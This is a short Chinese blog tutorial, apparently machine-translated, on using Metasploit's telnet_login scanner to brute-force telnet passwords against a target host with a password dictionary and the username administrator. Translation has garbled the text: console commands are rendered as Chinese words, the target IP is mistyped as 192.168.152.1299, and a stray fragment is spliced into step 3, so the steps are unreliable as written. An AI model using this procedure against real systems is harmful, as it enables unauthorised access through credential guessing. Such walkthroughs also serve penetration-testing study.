|
|
https://blog.51cto.com/13319402/2073011
1.进入metasploit:
root @ debian:〜#msfconsole
2.进行数据库连接:
msf> db_connect msf_user:111111@127.0.0.1/msf_database在后台重建模块缓存...
msf>连接到msf_database
3的db_status postgresql 。进行搜索下telnet模块
msf>搜索telnet_login
======== ========
名称披露日期等级描述
辅助/扫描仪/ telnet / telnet_login普通Telnet登录检查扫描仪
4.使用模块:
msf>使用辅助/扫描仪/ telnet / telnet_login
msf辅助(scanner / telnet / telnet_login)>
5.查看配置选项:
msf辅助(scanner / telnet / telnet_login)>显示选项
模块选项(辅助/扫描仪/ telnet / telnet_login):
6.进行配置:
auliary(scanner / telnet / telnet_login)>设置RHOSTS 192.168.152.1299```
RHOSTS => 192.168.152.129目标主机设置
集PASS_FILE /根/通过选择密码字典表
组USERNAME管理员设置用户名
利用进行爆破
7.查询查询结果查看
爆破远程登录密码登录
速度的快慢取决于密码复杂度与字典搜索表大小msfdb init->armitage
|
|